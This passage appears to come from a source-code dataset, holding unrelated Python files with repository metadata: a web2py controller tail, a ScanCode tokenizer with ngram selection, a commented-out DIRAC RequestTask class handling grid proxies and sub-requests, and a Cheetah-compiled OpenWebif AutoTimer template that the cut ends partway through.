http://..../[app]/default/data/delete/[table]/[id]
http://..../[app]/default/data/select/[table]
http://..../[app]/default/data/search/[table]
but URLs must be signed, i.e. linked with
A('table',_href=URL('data/tables',user_signature=True))
or with the signed load operator
LOAD('default','data.load',args='tables',ajax=True,user_signature=True)
"""
return dict(form=crud())
|
NewGlobalStrategy/NetDecisionMaking
|
controllers/default.py
|
Python
|
mit
| 7,638
|
[
"VisIt"
] |
ed01f7ffced665b660d813b17412f130285bd2b7061511a4e06813fd82298d4f
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015 nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/scancode-toolkit/
# The ScanCode software is licensed under the Apache License version 2.0.
# Data generated with ScanCode require an acknowledgment.
# ScanCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with ScanCode or any ScanCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with ScanCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# ScanCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# ScanCode is a free software code scanning tool from nexB Inc. and others.
# Visit https://github.com/nexB/scancode-toolkit/ for support and download.
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from itertools import islice
from itertools import izip
import re
from zlib import crc32
from textcode.analysis import text_lines
"""
Utilities to break texts in lines and tokens (aka. words) with specialized version
for queries and rules texts.
"""
def query_lines(location=None, query_string=None, strip=True):
"""
Return an iterable of text lines given a file at `location` or a
`query string`. Include empty lines.
"""
# TODO: OPTIMIZE: tokenizing line by line may be rather slow
# we could instead get lines and tokens at once in a batch?
lines = []
if location:
lines = text_lines(location, demarkup=False)
elif query_string:
if strip:
keepends = False
else:
keepends = True
lines = query_string.splitlines(keepends)
for line in lines:
if strip:
yield line.strip()
else:
yield line
# Split on whitespace and punctuations: keep only characters and +.
# Keeping the + is important for licenses name such as GPL2+.
_letter_or_digit = '[a-zA-Z0-9]+ ?\+'
_not_punctuation = '[^!\"#\$%&\'\(\)\*,\-\./:;<=>\?@\[\]\^_`\{\|\}\\\~\s\+\x92\x93\x94”“’–]'
query_pattern = _letter_or_digit + '|' + _not_punctuation
word_splitter = re.compile('(?:%s)+' % query_pattern, re.UNICODE).findall
def query_tokenizer(text, lower=True):
"""
Return an iterable of tokens from a unicode query text.
"""
if not text:
return []
text = lower and text.lower() or text
return (token for token in word_splitter(text) if token)
# Alternate pattern used for matched text collection
# collect tokens and non-token texts in two different groups
_punctuation = '[!\"#\$%&\'\(\)\*,\-\./:;<=>\?@\[\]\^_`\{\|\}\\\~\s\+\x92\x93\x94”“’–]'
_text_capture_pattern = '(?P<token>(?:' + query_pattern + ')+)' + '|' + '(?P<punct>' + _punctuation + '+)'
tokens_and_non_tokens = re.compile(_text_capture_pattern, re.UNICODE).finditer
def matched_query_text_tokenizer(text):
"""
Return an iterable of tokens and non-tokens from a unicode query text keeping
everything (including punctuations, line endings, etc.)
The returned iterable contains 2-tuples of:
- True if the string is a text token or False if this is not (such as punctuation, spaces, etc).
- the corresponding string
This is used to reconstruct the matched query text accurately.
"""
if not text:
return
for match in tokens_and_non_tokens(text):
if not match:
continue
mgd = match.groupdict()
token = mgd.get('token')
punct = mgd.get('punct')
if token or punct:
yield (True, token) if token else (False, punct)
# Template-aware splitter, keeping a templated part {{anything}} as a token.
# This splitter yields plain token strings or double braces-enclosed strings
# {{something}} for templates. curly barces are otherwise treated as punctuation.
# A template part is anything enclosed in double braces
template_pattern = '\{\{[^{}]*\}\}'
rule_pattern = '(?:%s)+|%s+' % (query_pattern, template_pattern,)
# rule_pattern = template_pattern
template_splitter = re.compile(rule_pattern , re.UNICODE).findall
def rule_tokenizer(text, lower=True):
"""
Return an iterable of tokens from a unicode rule text, skipping templated
parts, including leading and trailing templated parts.
For example:
>>> list(rule_tokenizer(''))
[]
>>> list(rule_tokenizer('some Text with spAces! + _ -'))
[u'some', u'text', u'with', u'spaces']
Unbalanced templates are handled correctly:
>>> list(rule_tokenizer('{{}some }}Text with spAces! + _ -'))
[u'some', u'text', u'with', u'spaces']
Templates are handled and skipped for templated sequences:
>>> list(rule_tokenizer('{{Hi}}some {{}}Text with{{noth+-_!@ing}} {{junk}}spAces! + _ -{{}}'))
[u'some', u'text', u'with', u'spaces']
"""
if not text:
return []
text = lower and text.lower() or text
tokens = template_splitter(text)
# skip templates
return (token for token in tokens if token and not token.startswith('{{'))
def ngrams(iterable, ngram_length):
"""
Return an iterable of ngrams of length `ngram_length` given an iterable.
Each ngram is a tuple of ngram_length items.
The returned iterable is empty if the input iterable contains less than
`ngram_length` items.
Note: this is a fairly arcane but optimized way to compute ngrams.
For example:
>>> list(ngrams([1,2,3,4,5], 2))
[(1, 2), (2, 3), (3, 4), (4, 5)]
>>> list(ngrams([1,2,3,4,5], 4))
[(1, 2, 3, 4), (2, 3, 4, 5)]
>>> list(ngrams([1,2,3,4], 2))
[(1, 2), (2, 3), (3, 4)]
>>> list(ngrams([1,2,3], 2))
[(1, 2), (2, 3)]
>>> list(ngrams([1,2], 2))
[(1, 2)]
>>> list(ngrams([1], 2))
[]
This also works with arrays or tuples:
>>> from array import array
>>> list(ngrams(array(b'h', [1,2,3,4,5]), 2))
[(1, 2), (2, 3), (3, 4), (4, 5)]
>>> list(ngrams(tuple([1,2,3,4,5]), 2))
[(1, 2), (2, 3), (3, 4), (4, 5)]
"""
return izip(*(islice(iterable, i, None) for i in range(ngram_length)))
def select_ngrams(ngrams, with_pos=False):
"""
Return an iterable as a subset of a sequence of ngrams using the hailstorm
algorithm. If `with_pos` is True also include the starting position for the ngram
in the original sequence.
Definition from the paper: http://www2009.eprints.org/7/1/p61.pdf
The algorithm first fingerprints every token and then selects a shingle s if
the minimum fingerprint value of all k tokens in s occurs at the first or the
last position of s (and potentially also in between). Due to the
probabilistic properties of Rabin fingerprints the probability that a shingle
is chosen is 2/k if all tokens in the shingle are different.
For example:
>>> list(select_ngrams([(2, 1, 3), (1, 1, 3), (5, 1, 3), (2, 6, 1), (7, 3, 4)]))
[(2, 1, 3), (1, 1, 3), (2, 6, 1), (7, 3, 4)]
Positions can also be included. In this case, tuple of (pos, ngram) are returned:
>>> list(select_ngrams([(2, 1, 3), (1, 1, 3), (5, 1, 3), (2, 6, 1), (7, 3, 4)], with_pos=True))
[(0, (2, 1, 3)), (1, (1, 1, 3)), (3, (2, 6, 1)), (4, (7, 3, 4))]
This works also from a generator:
>>> list(select_ngrams(x for x in [(2, 1, 3), (1, 1, 3), (5, 1, 3), (2, 6, 1), (7, 3, 4)]))
[(2, 1, 3), (1, 1, 3), (2, 6, 1), (7, 3, 4)]
"""
last = None
for i, ngram in enumerate(ngrams):
# FIXME: use a proper hash
nghs = [crc32(str(ng)) for ng in ngram]
min_hash = min(nghs)
if with_pos:
ngram = (i, ngram,)
if nghs[0] == min_hash or nghs[-1] == min_hash:
yield ngram
last = ngram
else:
# always yield the first or last ngram too.
if i == 0:
yield ngram
last = ngram
if last != ngram:
yield ngram
|
yasharmaster/scancode-toolkit
|
src/licensedcode/tokenize.py
|
Python
|
apache-2.0
| 8,538
|
[
"VisIt"
] |
096ff806b2a86cdabd9b4062845e466e5d88c17b7ff2339f3d83e960a69ad9aa
|
# ########################################################################
# # $HeadURL $
# # File: RequestTask.py
# # Author: Krzysztof.Ciba@NOSPAMgmail.com
# # Date: 2011/10/12 12:08:51
# ########################################################################
# """ :mod: RequestTask
# =================
#
# .. module: RequestTask
# :synopsis: base class for requests execution in separate subprocesses
# .. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
#
# Base class for requests execution in a separate subprocesses.
#
# :deprecated:
# """
#
# __RCSID__ = "$Id$"
#
# # #
# # @file RequestTask.py
# # @author Krzysztof.Ciba@NOSPAMgmail.com
# # @date 2011/10/12 12:09:18
# # @brief Definition of RequestTask class.
#
# from DIRAC.DataManagementSystem.Client.DataManager import DataManager
# from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
#
#
# class RequestTask( object ):
# """
# .. class:: RequestTask
#
# Base class for DMS 'transfer', 'removal' and 'register' Requests processing.
# This class is meant to be executed as a ProcessTask inside ProcessPool.
#
# The most important and common global DIRAC objects are created in RequestTask constructor.
# This includes gLogger, gConfig, gProxyManager, S_OK and S_ERROR. The constructor also
# imports a set of common modules: os, sys, re, time and everything from types module.
#
# All other DIRAC tools and clients (i.e. DataManager) are instance attributes of RequestTask class
#
# All currently proxied tools are::
#
# DataLoggingClient -- self.dataLoggingClient()
# RequestClient -- self.requestClient()
# StorageFactory -- self.storageFactory()
#
# SubLogger message handles for all levels are also proxied, so you can directly use them in your code, i.e.::
#
# self.info("An info message")
# self.debug("This will be shown only in debug")
#
# For handling sub-request one has to register their actions handlers using :self.addOperationAction:
# method. This method checks if handler is defined as a method of inherited class and then puts its
# definition into internal operation dispatcher dictionary with a key of sub-request's operation name.
#
# Each operation handler should have the signature::
#
# def operationName( self, index, requestObj, subRequestAttrs, subRequestFiles )
#
# where index is a sub-request counter, requestObj is a RequestContainer instance,
# subRequestAttrs is a dict with sub-request attributes and subRequestFiles is a dict with
# files attached to the sub-request.
#
# Handlers shoudl always return S_OK with value of (modified or not) requestObj, S_ERROR with some
# error message otherwise.
#
# Processing of request is done automatically in self.__call__, one doesn't have to worry about changing
# credentials, looping over subrequests or request finalizing -- only sub-request processing matters in
# the all inherited classes.
#
# Concerning :MonitringClient: (or better known its global instance :gMonitor:), if someone wants to send
# some metric over there, she has to put in agent's code registration of activity and then in a particular
# task use :RequestTask.addMark: to save monitoring data. All monitored activities are held in
# :RequestTask.__monitor: dict which at the end of processing is returned from :RequestTask.__call__:.
# The values are then processed and pushed to the gMonitor instance in the default callback function.
# """
#
# ## reference to DataLoggingClient
# __dataLoggingClient = None
# # # reference to RequestClient
# __requestClient = None
# # # reference to StotageFactory
# __storageFactory = None
# # # subLogger
# __log = None
# # # request type
# __requestType = None
# # # placeholder for request owner DB
# requestOwnerDN = None
# # # placeholder for Request owner group
# requestOwnerGroup = None
#
# # # operation dispatcher for SubRequests,
# # # a dictonary
# # # "operation" => methodToRun
# # #
# __operationDispatcher = {}
# # # holder for DataManager proxy file
# __dataManagerProxy = None
# # # monitoring dict
# __monitor = {}
#
# def __init__( self, requestString, requestName, executionOrder, jobID, configPath ):
# """ c'tor
#
# :param self: self reference
# :param str requestString: XML serialised RequestContainer
# :param str requestName: request name
# :param list executionOrder: request execution order
# :param int jobID: jobID
# :param str sourceServer: request's source server
# :param str configPath: path in CS for parent agent
# """
# # # fixtures
#
# # # python fixtures
# import os, os.path, sys, time, re, types
# self.makeGlobal( "os", os )
# self.makeGlobal( "os.path", os.path )
# self.makeGlobal( "sys", sys )
# self.makeGlobal( "time", time )
# self.makeGlobal( "re", re )
# # # export all Types from types
# [ self.makeGlobal( item, getattr( types, item ) ) for item in dir( types ) if "Type" in item ]
#
# # # DIRAC fixtures
# from DIRAC.FrameworkSystem.Client.Logger import gLogger
# self.__log = gLogger.getSubLogger( "%s/%s" % ( self.__class__.__name__, str( requestName ) ) )
#
# self.always = self.__log.always
# self.notice = self.__log.notice
# self.info = self.__log.info
# self.debug = self.__log.debug
# self.warn = self.__log.warn
# self.error = self.__log.error
# self.exception = self.__log.exception
# self.fatal = self.__log.fatal
#
# from DIRAC import S_OK, S_ERROR
# from DIRAC.ConfigurationSystem.Client.Config import gConfig
# from DIRAC.FrameworkSystem.Client.ProxyManagerClient import gProxyManager
# from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getGroupsWithVOMSAttribute
# from DIRAC.ConfigurationSystem.Client.ConfigurationData import gConfigurationData
# from DIRAC.DataManagementSystem.Client.DataManager import DataManager
# from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
#
#
# # # export DIRAC global tools and functions
# self.makeGlobal( "S_OK", S_OK )
# self.makeGlobal( "S_ERROR", S_ERROR )
# self.makeGlobal( "gLogger", gLogger )
# self.makeGlobal( "gConfig", gConfig )
# self.makeGlobal( "gProxyManager", gProxyManager )
# self.makeGlobal( "getGroupsWithVOMSAttribute", getGroupsWithVOMSAttribute )
# self.makeGlobal( "gConfigurationData", gConfigurationData )
#
# # # save request string
# self.requestString = requestString
# # # build request object
# from DIRAC.RequestManagementSystem.Client.RequestContainer import RequestContainer
# self.requestObj = RequestContainer( init = False )
# self.requestObj.parseRequest( request = self.requestString )
# # # save request name
# self.requestName = requestName
# # # .. and jobID
# self.jobID = jobID
# # # .. and execution order
# self.executionOrder = executionOrder
#
# # # save config path
# self.__configPath = configPath
# # # set requestType
# self.setRequestType( gConfig.getValue( os.path.join( configPath, "RequestType" ), "" ) )
# # # get log level
# self.__log.setLevel( gConfig.getValue( os.path.join( configPath, self.__class__.__name__, "LogLevel" ), "INFO" ) )
# # # clear monitoring
# self.__monitor = {}
# # # save DataManager proxy
# if "X509_USER_PROXY" in os.environ:
# self.info( "saving path to current proxy file" )
# self.__dataManagerProxy = os.environ["X509_USER_PROXY"]
# else:
# self.error( "'X509_USER_PROXY' environment variable not set" )
#
# self.fc = FileCatalog()
# self.dm = DataManager()
#
# self.dm = DataManager()
# self.fc = FileCatalog()
#
#
# def dataManagerProxy( self ):
# """ get dataManagerProxy file
#
# :param self: self reference
# """
# return self.__dataManagerProxy
#
# def addMark( self, name, value = 1 ):
# """ add mark to __monitor dict
#
# :param self: self reference
# :param name: mark name
# :param value: value to be
#
# """
# if name not in self.__monitor:
# self.__monitor.setdefault( name, 0 )
# self.__monitor[name] += value
#
# def monitor( self ):
# """ get monitoring dict
#
# :param cls: class reference
# """
# return self.__monitor
#
# def makeGlobal( self, objName, objDef ):
# """ export :objDef: to global name space using :objName: name
#
# :param self: self reference
# :param str objName: symbol name
# :param mixed objDef: symbol definition
# :throws: NameError if symbol of that name is already in
# """
# if objName not in __builtins__:
# if type( __builtins__ ) == type( {} ):
# __builtins__[objName] = objDef
# else:
# setattr( __builtins__, objName, objDef )
# return True
#
# def requestType( self ):
# """ get request type
#
# :params self: self reference
# """
# return self.__requestType
#
# def setRequestType( self, requestType ):
# """ set request type
#
# :param self: self reference
# """
# self.debug( "Setting requestType to %s" % str( requestType ) )
# self.__requestType = requestType
#
#
# @classmethod
# def dataLoggingClient( cls ):
# """ DataLoggingClient getter
# :param cls: class reference
# """
# if not cls.__dataLoggingClient:
# from DIRAC.DataManagementSystem.Client.DataLoggingClient import DataLoggingClient
# cls.__dataLoggingClient = DataLoggingClient()
# return cls.__dataLoggingClient
#
# @classmethod
# def requestClient( cls ):
# """ RequestClient getter
# :param cls: class reference
# """
# if not cls.__requestClient:
# from DIRAC.Core.DISET.RPCClient import RPCClient
# from DIRAC.RequestManagementSystem.Client.RequestClient import RequestClient
# cls.__requestClient = RequestClient()
# return cls.__requestClient
#
# @classmethod
# def storageFactory( cls ):
# """ StorageFactory getter
#
# :param cls: class reference
# """
# if not cls.__storageFactory:
# from DIRAC.Resources.Storage.StorageFactory import StorageFactory
# cls.__storageFactory = StorageFactory()
# return cls.__storageFactory
#
# def changeProxy( self, ownerDN, ownerGroup ):
# """ get proxy from gProxyManager, save it to file
#
# :param self: self reference
# :param str ownerDN: request owner DN
# :param str ownerGroup: request owner group
# :return: S_OK with name of newly created owner proxy file
# """
# ownerProxy = gProxyManager.downloadVOMSProxy( str( ownerDN ), str( ownerGroup ) )
# if not ownerProxy["OK"] or not ownerProxy["Value"]:
# reason = ownerProxy["Message"] if "Message" in ownerProxy else "No valid proxy found in ProxyManager."
# return S_ERROR( "Change proxy error for '%s'@'%s': %s" % ( ownerDN, ownerGroup, reason ) )
# ownerProxyFile = ownerProxy["Value"].dumpAllToFile()
# if not ownerProxyFile["OK"]:
# return S_ERROR( ownerProxyFile["Message"] )
# ownerProxyFile = ownerProxyFile["Value"]
# os.environ["X509_USER_PROXY"] = ownerProxyFile
# return S_OK( ownerProxyFile )
#
# ######################################################################
# # operationDispatcher
# @classmethod
# def operationDispatcher( cls ):
# """ operation dispatcher getter
#
# :param cls: class reference
# """
# return cls.__operationDispatcher
#
# @classmethod
# def addOperationAction( cls, operation, methodToRun, overwrite = True ):
# """ register handler :methodToRun: for SubRequest operation :operation:
# :warn: all handlers should have the same signature
# :param self: self reference
# :param str operation: SubRequest operation name
# :param MethodType methodToRun: handler to be executed for SubRequest
# :param bool overwrite: flag to overwrite handler, if already present
# :return: S_OK/S_ERROR
#
# Every action handler should return S_OK with of a structure::
#
# { "OK" : True,
# "Value" : requestObj # that has been sent to operation handler
# }
#
# otherwise S_ERROR.
#
# """
# if operation in cls.__operationDispatcher and not overwrite:
# return S_ERROR( "addOperationAction: operation for '%s' is already registered" % operation )
# if type( methodToRun ) is not MethodType:
# return S_ERROR( "addOperationAction: wrong type (%s = types.MethodType) for '%s' operation" % \
# ( str( type( methodToRun ) ), operation ) )
# cls.__operationDispatcher[operation] = methodToRun
# return S_OK()
#
# def __call__( self ):
# """ generic function to process one Request of a type requestType
#
# This method could be run in a thread.
#
# :param self: self reference
# :param str requestType: request type
# :return: S_OK/S_ERROR
# """
# self.always( "executing request %s" % self.requestName )
#
# ################################################################
# # # get ownerDN and ownerGroup
# ownerDN = self.requestObj.getAttribute( "OwnerDN" )
# if not ownerDN["OK"]:
# return ownerDN
# ownerDN = ownerDN["Value"]
# ownerGroup = self.requestObj.getAttribute( "OwnerGroup" )
# if not ownerGroup["OK"]:
# return ownerGroup
# ownerGroup = ownerGroup["Value"]
#
# # # save request owner
# self.requestOwnerDN = ownerDN if ownerDN else ""
# self.requestOwnerGroup = ownerGroup if ownerGroup else ""
#
# #################################################################
# # # change proxy
# ownerProxyFile = None
# if ownerDN and ownerGroup:
# ownerProxyFile = self.changeProxy( ownerDN, ownerGroup )
# if not ownerProxyFile["OK"]:
# self.error( "handleReuqest: unable to get proxy for '%s'@'%s': %s" % ( ownerDN,
# ownerGroup,
# ownerProxyFile["Message"] ) )
# # update = self.putBackRequest( self.requestName, self.requestString )
# # if not update["OK"]:
# # self.error( "handleRequest: error when updating request: %s" % update["Message"] )
# # return update
# # return ownerProxyFile
# ownerProxyFile = None
# else:
# ownerProxyFile = ownerProxyFile["Value"]
# if ownerProxyFile:
# # self.ownerProxyFile = ownerProxyFile
# self.info( "Will execute request for '%s'@'%s' using proxy file %s" % ( ownerDN, ownerGroup, ownerProxyFile ) )
# else:
# self.info( "Will execute request for DataManager using her/his proxy" )
#
# #################################################################
# # # execute handlers
# ret = { "OK" : False, "Message" : "" }
# useServerCert = gConfig.useServerCertificate()
# try:
# # Execute task with the owner proxy even for contacting DIRAC services
# if useServerCert:
# gConfigurationData.setOptionInCFG( '/DIRAC/Security/UseServerCertificate', 'false' )
# ret = self.handleRequest()
# finally:
# if useServerCert:
# gConfigurationData.setOptionInCFG( '/DIRAC/Security/UseServerCertificate', 'true' )
# # # delete owner proxy
# if self.__dataManagerProxy:
# os.environ["X509_USER_PROXY"] = self.__dataManagerProxy
# if ownerProxyFile and os.path.exists( ownerProxyFile ):
# os.unlink( ownerProxyFile )
# if not ret["OK"]:
# self.error( "handleRequest: error during request processing: %s" % ret["Message"] )
# self.error( "handleRequest: will put original request back" )
# update = self.putBackRequest( self.requestName, self.requestString )
# if not update["OK"]:
# self.error( "handleRequest: error when putting back request: %s" % update["Message"] )
# # # return at least
# return ret
#
# def handleRequest( self ):
# """ read SubRequests and ExecutionOrder, fire registered handlers upon SubRequests operations
#
# :param self: self reference
# :param dict requestDict: request dictionary as read from self.readRequest
# """
#
# ##############################################################
# # here comes the processing
# ##############################################################
# res = self.requestObj.getNumSubRequests( self.__requestType )
# if not res["OK"]:
# errMsg = "handleRequest: failed to obtain number of '%s' subrequests." % self.__requestType
# self.error( errMsg, res["Message"] )
# return S_ERROR( res["Message"] )
#
# # # for gMonitor
# self.addMark( "Execute", 1 )
# # # process sub requests
# for index in range( res["Value"] ):
# self.info( "handleRequest: processing subrequest %s." % str( index ) )
# subRequestAttrs = self.requestObj.getSubRequestAttributes( index, self.__requestType )["Value"]
# if subRequestAttrs["ExecutionOrder"]:
# subExecutionOrder = int( subRequestAttrs["ExecutionOrder"] )
# else:
# subExecutionOrder = 0
# subRequestStatus = subRequestAttrs["Status"]
# if subRequestStatus != "Waiting":
# self.info( "handleRequest: subrequest %s has status '%s' and is not to be executed." % ( str( index ),
# subRequestStatus ) )
# continue
#
# if subExecutionOrder <= self.executionOrder:
# operation = subRequestAttrs["Operation"]
# if operation not in self.operationDispatcher():
# self.error( "handleRequest: '%s' operation not supported" % operation )
# else:
# self.info( "handleRequest: will execute %s '%s' subrequest" % ( str( index ), operation ) )
#
# # # get files
# subRequestFiles = self.requestObj.getSubRequestFiles( index, self.__requestType )["Value"]
# # # execute operation action
# ret = self.operationDispatcher()[operation].__call__( index,
# self.requestObj,
# subRequestAttrs,
# subRequestFiles )
# ################################################
# # # error in operation action?
# if not ret["OK"]:
# self.error( "handleRequest: error when handling subrequest %s: %s" % ( str( index ), ret["Message"] ) )
# self.requestObj.setSubRequestAttributeValue( index, self.__requestType, "Error", ret["Message"] )
# else:
# # # update ref to requestObj
# self.requestObj = ret["Value"]
# # # check if subrequest status == Done, disable finalisation if not
# subRequestDone = self.requestObj.isSubRequestDone( index, self.__requestType )
# if not subRequestDone["OK"]:
# self.error( "handleRequest: unable to determine subrequest status: %s" % subRequestDone["Message"] )
# else:
# if not subRequestDone["Value"]:
# self.warn( "handleRequest: subrequest %s is not done yet" % str( index ) )
#
# ################################################
# # Generate the new request string after operation
# newRequestString = self.requestObj.toXML()['Value']
# update = self.putBackRequest( self.requestName, newRequestString )
# if not update["OK"]:
# self.error( "handleRequest: error when updating request: %s" % update["Message"] )
# return update
#
# # # get request status
# if self.jobID:
# requestStatus = self.requestClient().getRequestStatus( self.requestName )
# if not requestStatus["OK"]:
# return requestStatus
# requestStatus = requestStatus["Value"]
# # # finalize request if jobID is present and request status = 'Done'
# self.info( "handleRequest: request status is %s" % requestStatus )
#
# if ( requestStatus["RequestStatus"] == "Done" ) and ( requestStatus["SubRequestStatus"] not in ( "Waiting", "Assigned" ) ):
# self.debug( "handleRequest: request is going to be finalised" )
# finalize = self.requestClient().finalizeRequest( self.requestName, self.jobID )
# if not finalize["OK"]:
# self.error( "handleRequest: error in request finalization: %s" % finalize["Message"] )
# return finalize
# self.info( "handleRequest: request is finalised" )
# # # for gMonitor
# self.addMark( "Done", 1 )
#
# # # should return S_OK with monitor dict
# return S_OK( { "monitor" : self.monitor() } )
#
# def putBackRequest( self, requestName, requestString ):
# """ put request back
#
# :param self: self reference
# :param str requestName: request name
# :param str requestString: XML-serilised request
# :param str sourceServer: request server URL
# """
# update = self.requestClient().updateRequest( requestName, requestString )
# if not update["OK"]:
# self.error( "putBackRequest: error when updating request: %s" % update["Message"] )
# return update
# return S_OK()
|
calancha/DIRAC
|
DataManagementSystem/private/RequestTask.py
|
Python
|
gpl-3.0
| 21,374
|
[
"DIRAC"
] |
f9c8c3d41e9cdce05a6686ffd519007f58c6ccefa6d3b0a95a32a327cf403ade
|
#!/usr/bin/env python
##################################################
## DEPENDENCIES
import sys
import os
import os.path
try:
import builtins as builtin
except ImportError:
import __builtin__ as builtin
from os.path import getmtime, exists
import time
import types
from Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion
from Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple
from Cheetah.Template import Template
from Cheetah.DummyTransaction import *
from Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList
from Cheetah.CacheRegion import CacheRegion
import Cheetah.Filters as Filters
import Cheetah.ErrorCatchers as ErrorCatchers
from Plugins.Extensions.OpenWebif.local import tstrings
##################################################
## MODULE CONSTANTS
VFFSL=valueFromFrameOrSearchList
VFSL=valueFromSearchList
VFN=valueForName
currentTime=time.time
__CHEETAH_version__ = '2.4.4'
__CHEETAH_versionTuple__ = (2, 4, 4, 'development', 0)
__CHEETAH_genTime__ = 1453357629.571931
__CHEETAH_genTimestamp__ = 'Thu Jan 21 15:27:09 2016'
__CHEETAH_src__ = '/home/babel/Build/Test/OpenPLi5/openpli5.0/build/tmp/work/tmnanoseplus-oe-linux/enigma2-plugin-extensions-openwebif/1+gitAUTOINC+186ea358f6-r0/git/plugin/controllers/views/ajax/at.tmpl'
__CHEETAH_srcLastModified__ = 'Thu Jan 21 15:27:08 2016'
__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template Engine'
if __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:
raise AssertionError(
'This template was compiled with Cheetah version'
' %s. Templates compiled before version %s must be recompiled.'%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
class at(Template):
##################################################
## CHEETAH GENERATED METHODS
def __init__(self, *args, **KWs):
super(at, self).__init__(*args, **KWs)
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
def respond(self, trans=None):
## CHEETAH: main method generated for this template
if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
trans = self.transaction # is None unless self.awake() was called
if not trans:
trans = DummyTransaction()
_dummyTrans = True
else: _dummyTrans = False
write = trans.response().write
SL = self._CHEETAH__searchList
_filter = self._CHEETAH__currentFilter
########################################
## START - generated method body
_orig_filter_54425158 = _filter
filterName = u'WebSafe'
if self._CHEETAH__filters.has_key("WebSafe"):
_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]
else:
_filter = self._CHEETAH__currentFilter = \
self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter
write(u'''<style>
#atlist .ui-selecting { background: #FECA40; }
#atlist .ui-selected { background: #F39814; color: white; }
#atlist { list-style-type: none; margin: 0; padding: 0; }
#atlist li { margin: 3px; padding: 0.4em; font-size: 1.1em; height: 16px; overflow: hidden; text-overflow: ellipsis; white-space: nowrap;}
optgroup {font-weight: bolder;}
fieldset > label
{
\t-webkit-margin-top-collapse: separate;
\tmargin-top: 1.5em;
\tdisplay: inline-block;
}
</style>
<div id="content_main" style="min-height: 500px;">
\t<div id="info">
\t\t<div style="background-color: #00000">
\t\t<div style="display: inline-block; width: 100%; zoom: 1;">
\t\t\t<div style="float:left;width:200px;">
\t\t\t\t<h3>''')
_v = VFFSL(SL,"tstrings",True)['at_list'] # u"$tstrings['at_list']" on line 22, col 9
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_list']")) # from line 22, col 9.
write(u'''</h3>
\t\t\t\t<ol id="atlist">
\t\t\t\t</ol>
\t\t\t\t
\t\t\t</div>
\t\t\t<div style="margin-left:200px;">
\t\t\t\t<div style="display: inline-block; width: 100%; zoom: 1;">
\t\t\t\t\t<h3>''')
_v = VFFSL(SL,"tstrings",True)['at_at_edit'] # u"$tstrings['at_at_edit']" on line 29, col 10
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_at_edit']")) # from line 29, col 10.
write(u''' <span id=\'at_name\'></span></h3>
\t\t\t\t\t<div id="ateditcontent">
\t\t\t\t\t\t<form>
\t\t\t\t\t\t\t<fieldset>
\t\t\t\t\t\t\t\t<br><label for="enabled">''')
_v = VFFSL(SL,"tstrings",True)['at_enabled'] # u"$tstrings['at_enabled']" on line 33, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_enabled']")) # from line 33, col 34.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="enabled" id="enabled" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<br><label for="name">''')
_v = VFFSL(SL,"tstrings",True)['at_description'] # u"$tstrings['at_description']" on line 35, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_description']")) # from line 35, col 31.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="text" name="name" id="name" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<br><label for="match">''')
_v = VFFSL(SL,"tstrings",True)['at_title_match'] # u"$tstrings['at_title_match']" on line 37, col 32
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_title_match']")) # from line 37, col 32.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="text" name="match" id="match" class="text ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<!-- <label for="searchType">''')
_v = VFFSL(SL,"tstrings",True)['at_search_type'] # u"$tstrings['at_search_type']" on line 39, col 38
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_search_type']")) # from line 39, col 38.
write(u''':</label> -->
\t\t\t\t\t\t\t\t<select name="searchType" id="searchType">
\t\t\t\t\t\t\t\t<option value="partial" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_partial_match'] # u"$tstrings['at_partial_match']" on line 41, col 53
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_partial_match']")) # from line 41, col 53.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="exact">''')
_v = VFFSL(SL,"tstrings",True)['at_exact_match'] # u"$tstrings['at_exact_match']" on line 42, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_exact_match']")) # from line 42, col 31.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="description">''')
